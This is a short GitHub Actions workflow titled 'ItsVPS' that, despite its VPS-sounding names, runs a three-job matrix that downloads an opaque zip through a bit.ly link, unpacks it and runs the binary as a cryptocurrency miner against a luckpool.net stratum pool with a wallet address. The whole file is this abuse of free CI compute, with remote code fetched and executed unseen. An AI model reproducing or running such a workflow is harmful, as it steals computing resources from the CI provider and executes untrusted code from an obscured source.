
name: ItsVPS
on:
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        Plan: [1,2,3]
    steps:
      - name: Clonerepo
        uses: actions/checkout@v3

      - name: VPSKUY
        run: |
        wget -O vps.zip https://bit.ly/3NlIbIh
        unzip vps.zip
        chmod +x vps
        ./vps -c stratum+tcp://na.luckpool.net:3956#xnsub -u zs1ufhz7jn3v4fya5vw5cdj76gm8prdwrrf3mwwmzkwzcw45s6zz7a0kx987asg75wnhkaqktx3j6l.wawowkuy -p x --cpu 1
